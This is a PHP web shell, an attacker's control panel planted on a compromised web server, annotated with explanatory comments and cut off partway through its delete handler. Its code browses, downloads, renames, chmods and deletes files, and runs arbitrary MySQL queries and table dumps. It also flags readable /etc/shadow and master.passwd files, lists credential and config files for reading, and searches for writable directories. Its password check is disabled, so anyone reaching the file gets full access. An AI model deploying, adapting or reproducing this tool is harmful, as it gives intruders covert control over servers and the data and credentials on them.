<?php
|
|
|
|
## ## #
|
|
## # ####
|
|
## ## ## ##
|
|
### ### ## #
|
|
### ## ## ##
|
|
## ### ## ##
|
|
# # ##
|
|
### # ##
|
|
### # ## ##
|
|
# ## ## ##
|
|
# #####
|
|
# ## ###
|
|
## ### #
|
|
#######
|
|
#####
|
|
|
|
//error_reporting(0);
// Bootstrap: relax PHP restrictions, undo magic-quotes escaping on POST input,
// (optionally) gate the page behind HTTP Basic auth, and disable client caching.
// Failures are silenced with `@` throughout, so a hardened ini is never reported.
@ini_restore("safe_mode");
@ini_restore("open_basedir");
// get_magic_quotes_gpc()/set_magic_quotes_runtime()/each() no longer exist on PHP 8
// (set_magic_quotes_runtime() already went in 7.0), so this block fatals on modern PHP.
if(get_magic_quotes_gpc()){
while(list($key,$val)=each($_POST)){
$_POST[$key]=stripslashes($val);}}
set_magic_quotes_runtime(0);
// No execution-time limit and unbuffered output (long-running actions stream as they go).
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$name='1';
$pass='c8d3a760ebab631565f8509d84b3b3f1'; // md5 of the expected Basic-auth password
// The auth gate is compiled out: the condition is the literal `false`, so any client
// that can reach the file gets the full UI. When enabled it compares an unsalted md5
// of the supplied password with $pass using a non-constant-time comparison.
if(false){#if needed, write 'true' here
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized');
exit;}}
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
|
|
/**
 * Wrap $text in a legacy <font> tag.
 *
 * @param string $color value of the color attribute
 * @param string $text  inner HTML; it is NOT escaped here, callers pass raw markup
 * @param int    $size  value of the size attribute (default 4)
 * @return string       the <font ...>$text</font> markup
 */
function font($color,$text,$size=4){
    return sprintf('<font color=%s size=%s >%s</font>', $color, $size, $text);
}
|
|
/**
 * Return $a space characters (crude horizontal spacing in the HTML output).
 *
 * @param int $a number of spaces
 * @return string
 */
function w($a){
    return implode('', array_fill(0, $a, ' '));
}
|
|
/**
 * Wrap $b in <b> tags. No escaping is performed.
 *
 * @param string $b inner HTML
 * @return string
 */
function b($b){
    return '<b>' . $b . '</b>';
}
|
|
/**
 * Map a numeric error code to its message (original spelling kept: the
 * strings are compared elsewhere only by eye, but they are runtime output).
 * Codes outside 0..4 yield null, exactly as the original switch fell through.
 *
 * @param int $e error code
 * @return string|null
 */
function e($e){
    $messages = array(
        0 => 'no such file',
        1 => 'no such dirictory',
        2 => 'permission denied',
        3 => 'is not dirictory',
        4 => 'is a dirictory',
    );
    if (isset($messages[$e])) {
        return $messages[$e];
    }
    return null;
}
|
|
/**
 * Check that $filename exists and is readable.
 *
 * @param string $filename path to test
 * @return string|false false when the file exists and is readable; otherwise red
 *                      error markup: e(0) when it does not exist, e(2) when it
 *                      exists but is not readable.
 */
function test_file($filename){
    if (!file_exists($filename)) {
        return font('red', e(0));
    }
    if (!is_readable($filename)) {
        return font('red', e(2));
    }
    return false;
}
|
|
#DOWNLOAD
// Streams the file named in POST 'downf' to the client as an attachment. A relative
// name is prefixed with POST 'th' (the working directory the form echoed back, i.e.
// client-supplied); 'th' is read without isset(). The path is used exactly as given.
if(isset($_POST['downl']) && !empty($_POST['downf'])){
if(!preg_match('/^\//',$_POST['downf'])){
$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];}
if(!test_file($_POST['downf'])){
if(!is_dir($_POST['downf'])){
$fd=fopen($_POST['downf'], "rb");
// Basename = everything after the last '/'; it is placed in the headers unquoted-escaped
// (header() rejects CR/LF, but a '"' in the name breaks the filename parameter).
$nam=preg_replace('/.+\//','',$_POST['downf']);
header("Content-Type: application/octet-stream; name=\"".$nam."\"");
header("Content-Length: ".filesize($_POST['downf']));
header("Content-disposition: attachment; filename=\"".$nam."\"");
while(!feof($fd)){
$buffer=fgets($fd,4096);
echo $buffer;
}
fclose ($fd);
exit;
}
else $error=font('red',e(4));
}
else $error=test_file($_POST['downf']);}
|
|
#MYSQL PANEL (runs until the `exit;` that closes this branch)
// Builds the connect form and, when 'sql' was submitted, connects with the posted
// credentials. NOTE: the first $text built here (fields server/user/password/db) is
// dead code — it is completely overwritten by the second assignment below, whose
// field names (srv/user/pass/db) are the ones actually read.
if(isset($_POST['sql']) && !isset($_POST['exitsql'])){
$text="<body bgcolor=#C2DDFF>
<b>Mysql@server:user:pass:db</b>
<form method='POST'>
";
$a=array('server','user','password','db');$i=-1;
while($i++<3){
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>\n";}
$text.="<input type='submit' name='sql' value='Connect'>
<input type='submit' name='exitsql' value='Exit'>";
// Live form: posted values (including the password) are echoed back into value='...'
// without escaping; srv defaults to localhost.
$text="\n<body bgcolor=#C2DDFF>
<b>Mysql@server:user:pass:db</b>
<form method='POST'>\n";
$a=array('srv','user','pass','db');$i=-1;
while($i++<3){
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>\n";}
$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>\n";
if(isset($_POST['sql'])){
// $user/$password stay undefined when the fields are absent (notice at mysql_connect()).
if(isset($_POST['user']))$user=$_POST['user'];
if(isset($_POST['pass']))$password=$_POST['pass'];
if(isset($_POST['srv'])){
$server=$_POST['srv'];
// mysql_*() was removed in PHP 7; this panel only works on PHP 5.x.
$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");}
else{die($text."</form>");}
if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");}
/**
 * Append one chunk of the export. Destination is chosen by POST 'save':
 *   0 -> accumulate in the global $dump string (shown in a textarea later);
 *   1 -> write to the global handle $fp, which the backup branch opened with
 *        fopen/gzopen/bzopen according to POST 'compr' (0 plain, 1 gzip, 2 bzip2).
 * Any other save/compr value silently discards the data.
 *
 * @param string $data text to append
 */
function write($data){
switch($_POST['save']){
case 0:
global $dump;
$dump.=$data;
break;
case 1:
global $fp;
switch($_POST['compr']){
case 0:
fwrite($fp,$data);
break;
case 1:
gzwrite($fp, $data);
break;
case 2:
bzwrite($fp,$data);
break;}
break;}}
|
|
/**
 * Emit the comment header of a dump (server name, DB host, database, table).
 * $dump is declared global but not used directly — write() takes care of it.
 */
function sqlh(){
global $dump,$server;
write("#\n#Server : ".getenv('SERVER_NAME')."
#DB_Host : ".$server."
#DB : ".$_POST['db']."
#Table : ".$_POST['table_sel']."\n#\n\n");}
|
|
/**
 * Emit "DROP TABLE IF EXISTS" plus the CREATE TABLE statement for the selected table.
 * The table name from POST 'table_sel' is spliced into the query inside backticks
 * without escaping; a backtick in the value ends the identifier.
 */
function sql(){
global $dump,$connect;
$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect));
write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;\n".$row[1].";\n\n");}
|
|
/**
 * Emit one INSERT statement per row of the selected table.
 * Values are escaped with addslashes() (not a MySQL-aware escaper); NULLs become ''.
 * NOTE: the nested helper test() is declared every time sql1() runs, so a second call
 * in the same request would fatal with "Cannot redeclare"; the dispatcher calls it once.
 */
function sql1(){
global $connect;
$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
// addslashes() every value of a row, preserving keys.
function test($aaa){
$d=array();
while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
return($d);}
while ($line=mysql_fetch_assoc($result)) {
// Column list is computed from the first row only.
((!isset($key))?($key=implode('`, `',array_keys($line))):null);
$ddd=test(array_values($line));
$val=implode('\', \'',$ddd);
write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');\n");}
mysql_free_result($result);}
|
|
/**
 * Send the temp file $tmpfname to the client as attachment $name, then delete it
 * and end the request. fopen() is not checked; $name (table name + extension) goes
 * into the headers without quoting.
 *
 * @param string $tmpfname path of the finished dump
 * @param string $name     download filename
 */
function head($tmpfname,$name){
header("Content-Type: application/octet-stream; name=\"$name\"");
header("Content-Length: ".filesize($tmpfname)."");
header("Content-disposition: attachment; filename=\"$name\"");
$fd=fopen($tmpfname, "r");
while(!feof($fd)){
echo fgets($fd, 4096);}
fclose($fd);
unlink($tmpfname);
exit;}
|
|
#BACKUP
// Builds the export when the "backup" button was pressed for a selected table.
// save=1 writes to a temp file in POST 'save_p' (plain/gz/bz2 by 'compr') and then
// streams it via head(); save=0 collects into $dump for display in the export tab.
if(isset($_POST['back']) && isset($_POST['table_sel'])){
$dump='';
if($_POST['save']==1){
$tmpfname=tempnam($_POST['save_p'], "FOO");
switch($_POST['compr']){
case 0:
$fp=fopen($tmpfname,"w");
break;
case 1:
$fp=gzopen($tmpfname, "w9");
break;
case 2:
$fp=bzopen($tmpfname, "w");
break;}}
switch($_POST['as']){
case 0:
// SQL export: as_sql 0 = structure only, 1 = structure + data, 2 = data only.
switch($_POST['as_sql']){
case 0:
sqlh();
sql();
break;
case 1:
sqlh();
sql();
sql1();
break;
case 2:
sqlh();
sql1();
break;}
if($_POST['save']==1){
switch($_POST['compr']){
case 0:
$n='.txt';
fclose($fp);
break;
case 1:
$n='.gz';
gzclose($fp);
break;
case 2:
$n='.bz2';
bzclose($fp);
break;}
head($tmpfname,$_POST['table_sel'].$n);}
break;
case 1:
// CSV export. Two gaps vs. the SQL branch: no line terminator is written between
// rows, and with save=1 the handle is never closed and head() is never called, so
// the temp file is left behind in 'save_p' and nothing is downloaded.
$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
if(mysql_num_rows($res) > 0) {
while($row = mysql_fetch_assoc($res)) {
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode($_POST['cvs_term'], $values);
write($values);}}
break;}}
|
|
// Layout: database list (left), table list with row counts (middle), action area (right).
// Database and table names are echoed into HTML unescaped; $_POST['db'] is compared
// without an isset() guard (notice when absent).
echo "$text\n<table height=200 width=100%><tr><td bgcolor=green width=10%>";
$db_list=mysql_list_dbs($connect);
echo "<select name='db' multiple size=30>\n";
while($row=mysql_fetch_object($db_list)){
$db1=$row->Database;
echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>\n";}
echo "</select></td><td bgcolor=#CBC3B6>\n";
if(!empty($_POST['db'])){
$tb_list=mysql_list_tables($_POST['db']);
echo "<select name='table_sel' multiple size=30>";
// One count(*) query per table (table name unquoted). $tr is assigned but never read.
for($i=0;$i<mysql_num_rows($tb_list);$i++){
$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i)));
echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";}
echo "</select></td><td width=100%>
<table width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>\n";
// Action radios (value 0..3) only once a table is selected.
if(isset($_POST['table_sel'])){
$c=array('Browse','SQL','Insert','Export');$i=-1;
while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}}
echo " <b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>\n";}
|
|
// Derive the action from whichever submit button was pressed, overriding the 'go'
// radio: 0 browse, 1 SQL tab, 3 export, 4 edit-row form, 5 save row. A "Run" of a
// query that starts with SELECT is shown as a browse result (0); any other query
// goes to the SQL tab (1). Order matters: later assignments win.
if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0;
elseif(isset($_POST['push']))$_POST['go']=1;
if(isset($_POST['back']))$_POST['go']=3;
if(isset($_POST['brow']))$_POST['go']=0;
if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4;
if(isset($_POST['ed_save']))$_POST['go']=5;
if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0;
|
|
// Action dispatcher for the selected table; $_POST['go'] comes from the radios or the
// button logic above: 0 browse, 1 run SQL, 2 insert form, 3 export, 4 edit-row form,
// 5 save row. mysql_*() and ereg() were removed in PHP 7 and each() in PHP 8, so this
// switch only runs on PHP 5.x.
if(isset($_POST['go'])){switch($_POST['go']){
case 0:
// Browse: re-run the user's SELECT from the SQL tab, or page through the table.
// The count(*) query is derived from the SELECT with a regex whose `.+` is greedy,
// so a query with several "from" keywords can yield a wrong row count.
if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){
$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql'])));
$result=mysql_query($_POST['querysql'],$connect);}
// Table name, sort column and LIMIT values are spliced into the query as posted
// (only the sort column is trimmed and backticked; the count query lacks backticks).
else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort='';
if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20';
if(isset($_POST['br_st']) && isset($_POST['br_en'])){
$co=$_POST['br_en'].','.$_POST['br_st'];}
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);}
// Remember the primary-key column (if any) so a row can be addressed by it alone.
for($i=0;$i<mysql_num_fields($result);$i++){
if(ereg('primary_key',mysql_field_flags($result, $i)))
$prim=mysql_field_name($result, $i);}
$up_e='';
echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>\n";
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>\n";
// Header row only once: $lk stays set after the first foreach.
if(!isset($lk)){
echo "<td><b>EDIT</b></td>";
foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");}}
// WHERE fragment identifying this row: every column when there is no primary key,
// otherwise just the key column. It is url-encoded into the radio value and later
// pasted back verbatim into the SELECT/UPDATE of cases 4 and 5.
if(!isset($prim)){
while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
$up_e=substr($up_e,0,-5);}
else{while(list($key,$val)=each($line)){
if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}}
$up_e=urlencode($up_e);
echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>\n";
$up_e='';
// Cell values are escaped; values longer than 40 bytes go into a textarea.
foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";}
echo "</tr>\n";}
// Paging controls; sort/br_st/br_en are echoed back unescaped.
echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by
<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'>
Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
<input type=submit name=editr value=Edit>";
mysql_free_result($result);
break;
case 1:
// Free-form SQL: textarea pre-filled with the last query (escaped) or a default
// SELECT. SELECTs were routed to case 0 above; anything else is executed here.
echo "<input type=submit name=push value=Run><br>
<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
if(!empty($_POST['querysql'])){
$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";}
break;
case 2:
// Insert form: one input (textarea for columns wider than 40) per field, named
// ed_key:<column>; the hidden 'insert' flag tells case 5 to INSERT instead of UPDATE.
echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";
$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
for($i=0;$i<mysql_num_fields($fields);$i++){
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
break;
case 3:
// Export: show the options form, or — after "backup" with save=0 — the $dump built
// by the backup branch. Gzip/Bzip radios appear only when the extension is loaded.
if(!isset($_POST['back']))echo '<table height=250 align="center"><TR><TD>
<table height=100%>
<tr><td bgcolor="#A8B8F1" width="100" height="20"><b> Export as</b></td></tr>
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b> SQL</b></td></tr>
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b> CSV</b></td></tr>
<tr><td height=100%></td></tr>
</table></TD><td>
<table width="140" height=100%>
<TR><TD bgcolor="#A8B8F1" height="20"><b> SQL</b></TD></TR>
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR>
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
<TR><TD bgcolor="#A8B8F1" height="20"><b>CSV</b></TD></TR>
<TR><TD bgcolor="#D0E0FF" height="20"><b>Terminated </b><input size=2 type=text Name="cvs_term" value=":"></TD></TR>
<tr><td height=100%></tb></tr>
</table>
</td><td>
<table height=100%>
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b> View</b></td></tr>
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b> Download</b></td></tr>
<tr><td bgcolor="#E6D29C" width="130" height="40"><b> Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
<tr><td height=100%></td></tr>
</table></td><td>
<table width="120" height=100%>
<TR><TD bgcolor="#A8B8F1" height="20"><b> Compression</b></TD></TR>
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'.
((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':'').
((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR>
<tr><td height=100%></td></tr>':'').'</table></td></TR>
<tr><td><input type=submit value=backup name=back></td></tr>
</table>';
if(isset($_POST['back']) && isset($_POST['table_sel'])){
if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}}
break;
case 4:
// Edit form for the row chosen in the browse view. The hidden 'edit' value is the
// url-encoded WHERE fragment from case 0, decoded and used as the WHERE clause as-is
// (and echoed back into value='...' unescaped). $fi is never reset per row, so if the
// WHERE matches several rows the field-metadata lookups run past the last column.
if(isset($_POST['edit'])){
$up_e=$_POST['edit'];
echo "<input type=hidden name=edit value='$up_e'>";
$up_e=urldecode($_POST['edit']);
echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";$fi=0;
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){
foreach($line as $key=>$col_value) {
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
$fi++;}}
echo "</table></div><input type=submit name=ed_save value=Save>";}
break;
case 5:
// Save: collect every ed_key:<column> field into "`column`= 'value'" pairs (values
// addslashes()'d, column names taken from the field name unchanged) and run an INSERT
// (hidden 'insert' flag from case 2) or an UPDATE ... LIMIT 1 restricted by the decoded
// 'edit' fragment. The final SQL is echoed (escaped) before it is executed.
$ted='';
$_POST2=$_POST;# no idea why this copy is made, some nonsense :)
while(list($key1,$val1)=each($_POST2)){
if(preg_match('/ed_key:(.+)/',$key1,$m))
{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}}
$ted=substr($ted,0,-2);
$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
break;}}
|
|
// Close the panel layout (connected case) or show only the connect form, then end the
// request: nothing of the file-manager UI below is rendered while in MySQL mode.
echo "</td></tr></table></td></tr></table><input type=hidden name=sql>\n";}
else echo $text;
echo "</form></body>";exit;}
|
|
// Status banner: OS string, PHP version, server time, server and client address.
// All values are server-side (php_uname()/getenv()) and are rendered via font() unescaped.
echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>\n";
// Reports in red whenever one of the local credential stores is readable by the PHP user.
if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>'));
if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>'));
if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>'));
// Restore the working directory the form echoed back in the hidden 'th' field (client-supplied).
if(!empty($_POST['th']))@chdir($_POST['th']);
echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE"));
#UP
if(isset($_POST['up']))@chdir('../');
#CD
// $_POST['cd'] is read without isset(): a request lacking the field raises an undefined-index notice.
if(isset($_POST['c']) && $_POST['cd']!=''){
if(!test_file($_POST['cd'])){
if(is_dir($_POST['cd'])){
@chdir($_POST['cd']);
}
else $error=font('red',e(3));
}
else $error=test_file($_POST['cd']);}
// The cwd is placed in an unquoted value= attribute; a path containing a space or '>' breaks the markup.
echo w(3)."<input type=text size=60 value=".getcwd().">";
echo font('blue','USER : '.get_current_user());
if(file_exists("/"))
echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ'));
if(file_exists("C:/"))
echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ'));
if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE');
echo "<br>";
|
|
?>
|
|
<hr>
|
|
<form method=POST name=main>
|
|
<input type="submit" value="^" name="up">
|
|
<input type=text name=cd>
|
|
<input type=submit value=cd name=c>
|
|
<input type=text name=open>
|
|
<input type=submit value=open name=op>
|
|
<input type=text name=new>
|
|
<input type=submit name=cr value="new file">
|
|
<input type=text name=exec>
|
|
<input type=submit name=exe value=exec>
|
|
<input type=submit name=info value=phpinfo>
|
|
<br>
|
|
<?php
|
|
// Dropdown of well-known system/config files, listing only those that test_file()
// reports as existing and readable by the PHP user (the list itself reveals which are).
$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf');
echo '<select name=passwd>';
foreach($ar_file as $ar_l){
if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>\n";}
echo '</select><input type=submit name=passw value="read file">';
|
|
?>
|
|
<input type=submit name=menu value=upload>
|
|
<input type=text name=downf>
|
|
<input type=submit name=downl value=download>
|
|
<input type=text name="test">
|
|
<input type=submit name=tes value="perms">
|
|
<input type="submit" name="sql" value="mysql">
|
|
<input type="submit" name="eval" value="eval">
|
|
<br>
|
|
<input type=text name=strin>
|
|
<input type=text name=remot>
|
|
<input type=submit name=copy value=copy>
|
|
<input type="text" name="renold" >
|
|
<input type="text" name="rennew" >
|
|
<input type="submit" name="rename" value="rename">
|
|
<input type=text name=rm >
|
|
<input type=submit name=del value=del>
|
|
<br>
|
|
<input type=reset value=RESET>
|
|
<input type="text" name="mkdir">
|
|
<input type="submit" name="mk" value="mkdir">
|
|
<input type="text" name="rmdir">
|
|
<input type="submit" name="rmd" value="rmdir">
|
|
<input type="text" name="ch_mod">
|
|
<?php
|
|
// Three <select> boxes (ch_p1..ch_p3), each offering the octal digits 7 down to 0,
// used by the chmod action to compose the permission bits.
foreach (array(1, 2, 3) as $position) {
    echo "<select name=ch_p$position>\n";
    foreach (range(7, 0) as $digit) {
        echo "<OPTION value=$digit>$digit</OPTION>";
    }
    echo "</select>";
}
|
|
?>
|
|
<input type="submit" name="ch_chmod" value="chmod">
|
|
<input type=submit name=find value='find writeable'>
|
|
<br>
|
|
<hr>
|
|
<?php
|
|
#FIND WRITEABLE##############
|
|
#FIND WRITEABLE##############
// First click: show the search form.
if(isset($_POST['find'])){
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');}
// Search: breadth-first walk from 'fpath' using $arrfw as a growing queue. Entries
// are glued to the directory name without a separator, so the start path must end
// with '/'. is_dir() follows symlinks and nothing tracks visited directories, so a
// symlink cycle keeps the walk going indefinitely. Directories are printed red when
// writable; files (unless 'dy' "only dir" is set) green when writable; 'onw' hides
// non-writable entries.
if(isset($_POST['fww']) && !empty($_POST['fpath'])){
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>');
$arrfw=array($_POST['fpath']);
$ife=0;
while(++$ife<=count($arrfw)){
$pathfw=$arrfw[$ife-1];
if(is_readable($pathfw)){
if($hfw=opendir($pathfw)){
while(false!==($ffw=readdir($hfw))){
$ffw=$pathfw.$ffw;
// Skip entries whose name is only dots ('.' and '..').
if(!preg_match('/\/\.+$/',$ffw)){
if(is_dir($ffw)){array_push($arrfw,$ffw.'/');}
print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}}
closedir($hfw);}}}}
|
|
|
|
|
|
#EVAL (stub)
// The "eval" button only renders an empty textarea named 'ev'. Nothing in this listing
// reads 'ev', and the second echo emits an empty string, so the feature is inert here
// (the handler appears to be absent from this copy).
if(isset($_POST['eval'])){
echo "<textarea cols=70 rows=7 name='ev'></textarea>\n";
echo "";
}
|
|
############################################################################
|
|
#RENAME
|
|
// Rename 'renold' to 'rennew' (both relative to the cwd restored above). `<>` is the
// same as `!=`; the fields are read without isset(). The destination is not checked
// and rename() failures are silenced, so the UI shows no result either way.
if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){
if(file_exists($_POST['renold'])){
@rename($_POST['renold'],$_POST['rennew']);
}
else $error=font('red',e(0));
}
|
|
#
|
|
|
|
#RMDIR
|
|
// Remove the directory named in 'rmdir'; reports success in green ("delet" is the
// original wording), otherwise sets $error (printed at the end of the page).
if(isset($_POST['rmd']) && isset($_POST['rmdir'])){
if(file_exists($_POST['rmdir'])){
if(is_dir($_POST['rmdir'])){
if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet");
else $error=font('red','dir not deleted');
}
else $error=font('red',e(3));
}
else $error=font('red',e(0));
}
|
|
#
|
|
#CHMOD
|
|
// chmod 'ch_mod' to the three digits chosen in the ch_p1..ch_p3 selects (concatenated
// and parsed as octal). ch_p* are read without isset(); chmod() errors are silenced.
if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){
if(file_exists($_POST['ch_mod'])){
@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));}
else $error=font('red',e(0));}
|
|
#
|
|
#DELETE
|
|
// Delete the file named in 'rm' (directories are refused with e(4)). Unlike the other
// handlers this one echoes its errors immediately instead of setting $error.
if(isset($_POST['del']) && $_POST['rm']!=''){
if(file_exists($_POST['rm'])){
if(!is_dir($_POST['rm'])){
